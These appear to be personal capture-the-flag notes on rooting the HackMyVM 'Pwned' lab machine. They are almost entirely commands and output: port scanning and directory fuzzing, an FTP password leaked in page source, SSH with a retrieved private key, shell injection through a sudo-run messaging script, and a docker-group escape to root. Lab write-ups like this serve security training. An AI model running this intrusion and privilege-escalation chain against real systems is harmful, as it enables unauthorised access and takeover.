NOTES ABOUT Pwned
[ 2022-10-21 ] [ HackMyVM / Pwned ]Status: Rooted
Skills: Port Scanning, Fuzzing
Tools: nmap, ssh, ftp, gobuster, curl, docker
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
GETTING IN
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.33
/nothing (Status: 301) [Size: 308] [--> http://10.0.2.33/nothing/]
/server-status (Status: 403) [Size: 274]
/hidden_text (Status: 301) [Size: 312] [--> http://10.0.2.33/hidden_text/]
$ curl http://10.0.2.33/hidden_text/secret.dic -O
$ gobuster -q fuzz -w secret.dic -u http://10.0.2.33FUZZ
[...]
Found: [Status=301] [Length=311] http://10.0.2.33/pwned.vuln
[...]
$ curl http://10.0.2.33/pwned.vuln/
[...]
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
[...]
ftp 10.0.2.33
Connected to 10.0.2.33.
220 (vsFTPd 3.0.3)
Name (10.0.2.33:kali): ftpuser
331 Please specify the password.
Password: B0ss_B!TcH
230 Login successful.
[...]
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 .
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ..
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
$ ssh ariana@10.0.2.33 -i id_rsa
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana
Here is your user flag ↓↓↓↓↓↓↓
**************************
Try harder.need become root
ELEVATING PRIVILEGES
ariana@pwned:/$ sudo -u selena /home/messenger.sh
[...]
Enter username to send message : a
Enter message for a :bash
Sending message to a
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
cat /home/selena/user2.txt
**************************
You are near to me. you found selena too.
Try harder to catch me
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat root.txt
**************************
# init 0